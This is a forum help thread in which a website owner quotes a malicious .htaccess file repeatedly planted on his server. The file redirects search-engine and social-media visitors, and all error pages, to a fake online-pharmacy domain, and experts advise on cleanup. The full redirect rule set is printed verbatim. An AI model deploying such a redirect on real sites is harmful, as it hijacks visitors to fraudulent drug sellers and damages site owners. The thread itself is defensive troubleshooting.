We help IT Professionals succeed at work.

Security Risk ? htaccess file appearing in my website folders

MikeMCSD
MikeMCSD used Ask the Experts™
on
This file ".htaccess" is being placed on my server (Win 2008 R2)
in a number of folders where I have my websites,
including the  "wwwroot" folder.
Here is the contents of this file :

Options -Indexes
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*baidu.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*youtube.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*qq.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*twitter.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*blog.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*myspace.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://onlinemedsmedicine.ru/ [R,L]
ErrorDocument 401 http://onlinemedsmedicine.ru/
ErrorDocument 403 http://onlinemedsmedicine.ru/
ErrorDocument 404 http://onlinemedsmedicine.ru/
ErrorDocument 500 http://onlinemedsmedicine.ru/

I have to log into the server every few days and delete them.

Are these files dangerous?
How are they putting these files there?
Anyway of stopping this?
Thanks
Comment
Watch Question

Do more with

Expert Office
EXPERT OFFICE® is a registered trademark of EXPERTS EXCHANGE®
Steven CarnahanAssistant Vice President\Network Manager

Commented:
Dave BaldwinFixer of Problems
Most Valuable Expert 2014
Commented:
That is redirecting your visitors to fake drug sites.  At the very least you should change your FTP and/or account password to see if you can stop this from happening.  You might also want to contact your web hosting company and tell them in case someone has broken into the server.

Author

Commented:
thanks guys . .  I read this :

"For sites hosted on Apache one of the most common ways this type of hack is accomplished is a hack of an Apache file named .htaccess."

If the .htaccess file is for Apache and I'm using IIS, would the attack even work at all?
Dave BaldwinFixer of Problems
Most Valuable Expert 2014

Commented:
There is an addin for IIS that uses '.htaccess' but otherwise, I don't think so.  Still, the fact that it reappears means that you have a security hole.
Assistant Vice President\Network Manager
Commented:
There is certainly something wrong since it continues to return.

Something you could try while you are trying to find the issue is to create a generic .htaccess file and set it to read only. That may prevent the redirects in the short run.

*** This is not a solution and should not be the final step you take ***

Author

Commented:
thanks guys . .

I deleted the contents of the .htaccess file and set it to Read Only.
That seems to have prevented the file from being updated.